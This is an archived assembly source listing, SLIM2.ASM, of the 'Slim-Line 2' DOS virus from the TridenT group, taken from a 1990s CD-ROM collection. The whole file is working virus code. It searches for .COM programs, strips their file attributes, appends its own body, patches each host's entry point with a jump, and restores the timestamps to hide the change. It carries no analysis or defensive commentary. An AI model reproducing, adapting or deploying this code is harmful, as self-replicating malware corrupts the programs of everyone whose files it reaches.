home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / SLIM2.ASM < prev    next >
Assembly Source File  |  1995-05-23  |  3KB  |  147 lines
  1. ;
  2. ; The Slim-Line 2 virus, from the Slim-line virus collection.
  3. ; (C) 1993 by [DαRkRαY]/TridenT
  4. ;
  5. ; And this time it's a direct action COM infector.
  6. ;  <will be commented soon>
  7.  
  8. _CODE   SEGMENT
  9.         ASSUME  CS:_CODE, DS:_CODE, ES:_CODE
  10.         ORG     100h
  11.  
  12. FIRST:
  13.         DB      'D', 0E9h, 000h, 000h
  14.  
  15. VX:
  16.         MOV     BP,00000h
  17.  
  18.         LEA     SI,[BP + OLD_4_BYTES]
  19.         MOV     DI,00100h
  20.         PUSH    DI
  21.         MOV     CX,DI
  22.         MOVSW
  23.         MOVSW
  24.  
  25.         XOR     SI,SI
  26.         LEA     DI,[BP + LAST + 2]
  27.         PUSH    SI
  28.         PUSH    DI
  29.         PUSH    CX
  30.         REP     MOVSB
  31.  
  32. FIND_FILE:
  33.         MOV     AH,04Eh
  34.         LEA     DX,[BP + FIND]
  35.         MOV     CL,27h
  36. AGAIN:
  37.         INT     021h
  38.         JC      GO_ROOT
  39.  
  40. YES_FILE:
  41.         MOV     AX,04300h
  42.         MOV     DX,09Eh
  43.         INT     021h
  44.         PUSH    CX
  45.  
  46.         MOV     AX,04301h
  47.         XOR     CX,CX
  48.         INT     021h
  49.  
  50.         MOV     AX,03D02h
  51.         INT     021h
  52.         XCHG    AX,BX
  53.  
  54.  
  55.         MOV     AX,05700h
  56.         INT     021h
  57.         PUSH    CX
  58.         PUSH    DX
  59.  
  60.         MOV     AH,03Fh
  61.         MOV     CX,004h
  62.         LEA     DX,[BP + OLD_4_BYTES]
  63.         INT     021h
  64.  
  65.         MOV     SI,DX
  66.         LODSW
  67.         CMP     AX,0E944h
  68.         JE      DONT_INFECT
  69.  
  70.         MOV     AL,02h
  71.         CALL    SET_POINTER
  72.  
  73.         SUB     AX,00004h
  74.         MOV     WORD PTR [BP + VX + 2],AX
  75.         MOV     WORD PTR [BP + NEW_4_BYTES + 2],AX
  76.  
  77.         MOV     AH,040h
  78.         MOV     CL,(LAST - VX)
  79.         LEA     DX,[BP + VX]
  80.         INT     021h
  81.  
  82.         XOR     AX,AX
  83.         CALL    SET_POINTER
  84.  
  85.         MOV     AH,040h
  86.         MOV     CL,004h
  87.         LEA     DX,[BP + NEW_4_BYTES]
  88.         INT     021h
  89.  
  90. DONT_INFECT:
  91.         MOV     AX,05701h
  92.         POP     DX
  93.         POP     CX
  94.         INT     021h
  95.  
  96.         MOV     AH,03Eh
  97.         INT     021h
  98.  
  99.         MOV     AX,04301h
  100.         POP     CX
  101.         MOV     DX,09Eh
  102.         INT     021h
  103.  
  104.         MOV     AH,4Fh
  105.         JMP     AGAIN
  106.  
  107. GO_ROOT:
  108.  
  109.         MOV     AH,03Bh
  110.         LEA     DX,[BP + ROOT]
  111.         INT     021h
  112.         JC      EXIT
  113.         JMP     FIND_FILE
  114.  
  115. EXIT:
  116.         POP     CX
  117.         POP     SI
  118.         POP     DI
  119.         REP     MOVSB
  120.  
  121.         RET
  122.  
  123. SET_POINTER:
  124.         MOV     AH,042h
  125.         XOR     CX,CX
  126.         CWD
  127.         INT     021h
  128.         RET
  129.  
  130.         OLD_4_BYTES:    NOP
  131.                         NOP
  132.                         NOP
  133.                         RET
  134.  
  135.         FIND            DB      "*.COM", 000h
  136.         ROOT            DB      "\", 000h
  137.  
  138.         CUT             DB      ""
  139.         MARKER          DB      "[DR/TridenT]"
  140.         NAMED           DB      "Slim-Line 2 v0.9ß"
  141.         COUNTRY         DB      "Holland"
  142.         NEW_4_BYTES     DB      'D', 0E9h
  143. LAST:
  144.  
  145. _CODE   ENDS
  146.         END     FIRST
  147.